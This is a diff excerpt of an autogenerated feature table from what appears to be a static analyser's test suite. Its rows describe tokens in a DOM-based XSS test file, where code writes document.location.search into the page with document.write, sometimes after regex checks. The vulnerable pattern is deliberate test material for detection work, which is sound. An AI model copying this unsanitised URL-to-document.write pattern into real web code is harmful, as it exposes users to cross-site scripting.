element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:106:1:143:1 | return of function tst | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:106:1:143:1 | return of function tst | enclosingFunctionBody | v document location search substr 1 document write v /^\\d+$/ test v document write v m /^\\d+$/ exec v document write v v match /^\\d+$/ document write v v match ^\\d+$ document write v /\\d+/ test v document write v /^\\d+$/ test v document write v | +| autogenerated/Xss/DomBasedXss/tst.js:106:1:143:1 | return of function tst | enclosingFunctionName | tst | +| autogenerated/Xss/DomBasedXss/tst.js:106:1:143:1 | return of function tst | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:106:10:106:12 | tst | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:106:10:106:12 | tst | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:106:10:106:12 | tst | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:107:7:107:7 | v | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:107:7:107:7 | v | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:107:7:107:7 | v | enclosingFunctionBody | v document location search substr 1 document write v /^\\d+$/ test v document write v m /^\\d+$/ exec v document write v v match /^\\d+$/ document write v v match ^\\d+$ document write v /\\d+/ test v document write v /^\\d+$/ test v document write v | +| autogenerated/Xss/DomBasedXss/tst.js:107:7:107:7 | v | enclosingFunctionName | tst | +| autogenerated/Xss/DomBasedXss/tst.js:107:7:107:7 | v | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:107:7:107:44 | v | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:107:7:107:44 | v | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:107:7:107:44 | v | enclosingFunctionBody | v document location search substr 1 document write v /^\\d+$/ test v document write v m /^\\d+$/ exec v document write v v match /^\\d+$/ document write v v match ^\\d+$ document write v /\\d+/ test v document write v /^\\d+$/ test v document write v | +| autogenerated/Xss/DomBasedXss/tst.js:107:7:107:44 | v | enclosingFunctionName | tst | +| autogenerated/Xss/DomBasedXss/tst.js:107:7:107:44 | v | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:107:7:107:44 | v = doc ... bstr(1) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:107:7:107:44 | v = doc ... bstr(1) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:107:7:107:44 | v = doc ... bstr(1) | enclosingFunctionBody | v document location search substr 1 document write v /^\\d+$/ test v document write v m /^\\d+$/ exec v document write v v match /^\\d+$/ document write v v match ^\\d+$ document write v /\\d+/ test v document write v /^\\d+$/ test v document write v | +| autogenerated/Xss/DomBasedXss/tst.js:107:7:107:44 | v = doc ... bstr(1) | enclosingFunctionName | tst | +| autogenerated/Xss/DomBasedXss/tst.js:107:7:107:44 | v = doc ... bstr(1) | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:107:11:107:18 | document | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:107:11:107:18 | document | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:107:11:107:18 | document | enclosingFunctionBody | v document location search substr 1 document write v /^\\d+$/ test v document write v m /^\\d+$/ exec v document write v v match /^\\d+$/ document write v v match ^\\d+$ document write v /\\d+/ test v document write v /^\\d+$/ test v document write v | +| autogenerated/Xss/DomBasedXss/tst.js:107:11:107:18 | document | enclosingFunctionName | tst | +| autogenerated/Xss/DomBasedXss/tst.js:107:11:107:18 | document | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:107:11:107:27 | document.location | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:107:11:107:27 | document.location | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:107:11:107:27 | document.location | enclosingFunctionBody | v document location search substr 1 document write v /^\\d+$/ test v document write v m /^\\d+$/ exec v document write v v match /^\\d+$/ document write v v match ^\\d+$ document write v /\\d+/ test v document write v /^\\d+$/ test v document write v | +| autogenerated/Xss/DomBasedXss/tst.js:107:11:107:27 | document.location | enclosingFunctionName | tst | +| autogenerated/Xss/DomBasedXss/tst.js:107:11:107:27 | document.location | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:107:11:107:34 | documen ... .search | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:107:11:107:34 | documen ... .search | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:107:11:107:34 | documen ... .search | enclosingFunctionBody | v document location search substr 1 document write v /^\\d+$/ test v document write v m /^\\d+$/ exec v document write v v match /^\\d+$/ document write v v match ^\\d+$ document write v /\\d+/ test v document write v /^\\d+$/ test v document write v | +| autogenerated/Xss/DomBasedXss/tst.js:107:11:107:34 | documen ... .search | enclosingFunctionName | tst | +| autogenerated/Xss/DomBasedXss/tst.js:107:11:107:34 | documen ... .search | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:107:11:107:41 | documen ... .substr | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:107:11:107:41 | documen ... .substr | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:107:11:107:41 | documen ... .substr | enclosingFunctionBody | v document location search substr 1 document write v /^\\d+$/ test v document write v m /^\\d+$/ exec v document write v v match /^\\d+$/ document write v v match ^\\d+$ document write v /\\d+/ test v document write v /^\\d+$/ test v document write v | +| autogenerated/Xss/DomBasedXss/tst.js:107:11:107:41 | documen ... .substr | enclosingFunctionName | tst | +| autogenerated/Xss/DomBasedXss/tst.js:107:11:107:41 | documen ... .substr | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:107:11:107:44 | documen ... bstr(1) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:107:11:107:44 | documen ... bstr(1) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:107:11:107:44 | documen ... bstr(1) | enclosingFunctionBody | v document location search substr 1 document write v /^\\d+$/ test v document write v m /^\\d+$/ exec v document write v v match /^\\d+$/ document write v v match ^\\d+$ document write v /\\d+/ test v document write v /^\\d+$/ test v document write v | +| autogenerated/Xss/DomBasedXss/tst.js:107:11:107:44 | documen ... bstr(1) | enclosingFunctionName | tst | +| autogenerated/Xss/DomBasedXss/tst.js:107:11:107:44 | documen ... bstr(1) | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:107:11:107:44 | exceptional return of documen ... bstr(1) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:107:11:107:44 | exceptional return of documen ... bstr(1) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:107:11:107:44 | exceptional return of documen ... bstr(1) | enclosingFunctionBody | v document location search substr 1 document write v /^\\d+$/ test v document write v m /^\\d+$/ exec v document write v v match /^\\d+$/ document write v v match ^\\d+$ document write v /\\d+/ test v document write v /^\\d+$/ test v document write v | +| autogenerated/Xss/DomBasedXss/tst.js:107:11:107:44 | exceptional return of documen ... bstr(1) | enclosingFunctionName | tst | +| autogenerated/Xss/DomBasedXss/tst.js:107:11:107:44 | exceptional return of documen ... bstr(1) | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:107:20:107:27 | location | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:107:20:107:27 | location | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:107:20:107:27 | location | enclosingFunctionBody | v document location search substr 1 document write v /^\\d+$/ test v document write v m /^\\d+$/ exec v document write v v match /^\\d+$/ document write v v match ^\\d+$ document write v /\\d+/ test v document write v /^\\d+$/ test v document write v | +| autogenerated/Xss/DomBasedXss/tst.js:107:20:107:27 | location | enclosingFunctionName | tst | +| autogenerated/Xss/DomBasedXss/tst.js:107:20:107:27 | location | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:107:29:107:34 | search | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:107:29:107:34 | search | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:107:29:107:34 | search | enclosingFunctionBody | v document location search substr 1 document write v /^\\d+$/ test v document write v m /^\\d+$/ exec v document write v v match /^\\d+$/ document write v v match ^\\d+$ document write v /\\d+/ test v document write v /^\\d+$/ test v document write v | +| autogenerated/Xss/DomBasedXss/tst.js:107:29:107:34 | search | enclosingFunctionName | tst | +| autogenerated/Xss/DomBasedXss/tst.js:107:29:107:34 | search | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:107:36:107:41 | substr | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:107:36:107:41 | substr | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:107:36:107:41 | substr | enclosingFunctionBody | v document location search substr 1 document write v /^\\d+$/ test v document write v m /^\\d+$/ exec v document write v v match /^\\d+$/ document write v v match ^\\d+$ document write v /\\d+/ test v document write v /^\\d+$/ test v document write v | +| autogenerated/Xss/DomBasedXss/tst.js:107:36:107:41 | substr | enclosingFunctionName | tst | +| autogenerated/Xss/DomBasedXss/tst.js:107:36:107:41 | substr | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:107:43:107:43 | 1 | CalleeFlexibleAccessPath | document.location.search.substr | | autogenerated/Xss/DomBasedXss/tst.js:107:43:107:43 | 1 | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/tst.js:107:43:107:43 | 1 | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | @@ -16438,6 +114431,31 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/tst.js:107:43:107:43 | 1 | enclosingFunctionBody | v document location search substr 1 document write v /^\\d+$/ test v document write v m /^\\d+$/ exec v document write v v match /^\\d+$/ document write v v match ^\\d+$ document write v /\\d+/ test v document write v /^\\d+$/ test v document write v | | autogenerated/Xss/DomBasedXss/tst.js:107:43:107:43 | 1 | enclosingFunctionName | tst | | autogenerated/Xss/DomBasedXss/tst.js:107:43:107:43 | 1 | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:110:3:110:10 | document | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:110:3:110:10 | document | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:110:3:110:10 | document | enclosingFunctionBody | v document location search substr 1 document write v /^\\d+$/ test v document write v m /^\\d+$/ exec v document write v v match /^\\d+$/ document write v v match ^\\d+$ document write v /\\d+/ test v document write v /^\\d+$/ test v document write v | +| autogenerated/Xss/DomBasedXss/tst.js:110:3:110:10 | document | enclosingFunctionName | tst | +| autogenerated/Xss/DomBasedXss/tst.js:110:3:110:10 | document | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:110:3:110:16 | document.write | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:110:3:110:16 | document.write | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:110:3:110:16 | document.write | enclosingFunctionBody | v document location search substr 1 document write v /^\\d+$/ test v document write v m /^\\d+$/ exec v document write v v match /^\\d+$/ document write v v match ^\\d+$ document write v /\\d+/ test v document write v /^\\d+$/ test v document write v | +| autogenerated/Xss/DomBasedXss/tst.js:110:3:110:16 | document.write | enclosingFunctionName | tst | +| autogenerated/Xss/DomBasedXss/tst.js:110:3:110:16 | document.write | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:110:3:110:19 | document.write(v) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:110:3:110:19 | document.write(v) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:110:3:110:19 | document.write(v) | enclosingFunctionBody | v document location search substr 1 document write v /^\\d+$/ test v document write v m /^\\d+$/ exec v document write v v match /^\\d+$/ document write v v match ^\\d+$ document write v /\\d+/ test v document write v /^\\d+$/ test v document write v | +| autogenerated/Xss/DomBasedXss/tst.js:110:3:110:19 | document.write(v) | enclosingFunctionName | tst | +| autogenerated/Xss/DomBasedXss/tst.js:110:3:110:19 | document.write(v) | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:110:3:110:19 | exceptional return of document.write(v) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:110:3:110:19 | exceptional return of document.write(v) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:110:3:110:19 | exceptional return of document.write(v) | enclosingFunctionBody | v document location search substr 1 document write v /^\\d+$/ test v document write v m /^\\d+$/ exec v document write v v match /^\\d+$/ document write v v match ^\\d+$ document write v /\\d+/ test v document write v /^\\d+$/ test v document write v | +| autogenerated/Xss/DomBasedXss/tst.js:110:3:110:19 | exceptional return of document.write(v) | enclosingFunctionName | tst | +| autogenerated/Xss/DomBasedXss/tst.js:110:3:110:19 | exceptional return of document.write(v) | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:110:12:110:16 | write | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:110:12:110:16 | write | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:110:12:110:16 | write | enclosingFunctionBody | v document location search substr 1 document write v /^\\d+$/ test v document write v m /^\\d+$/ exec v document write v v match /^\\d+$/ document write v v match ^\\d+$ document write v /\\d+/ test v document write v /^\\d+$/ test v document write v | +| autogenerated/Xss/DomBasedXss/tst.js:110:12:110:16 | write | enclosingFunctionName | tst | +| autogenerated/Xss/DomBasedXss/tst.js:110:12:110:16 | write | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:110:18:110:18 | v | CalleeFlexibleAccessPath | document.write | | autogenerated/Xss/DomBasedXss/tst.js:110:18:110:18 | v | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/tst.js:110:18:110:18 | v | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | @@ -16446,6 +114464,31 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/tst.js:110:18:110:18 | v | enclosingFunctionName | tst | | autogenerated/Xss/DomBasedXss/tst.js:110:18:110:18 | v | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:110:18:110:18 | v | receiverName | document | +| autogenerated/Xss/DomBasedXss/tst.js:112:7:112:13 | /^\\d+$/ | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:112:7:112:13 | /^\\d+$/ | contextSurroundingFunctionParameters | () | +| 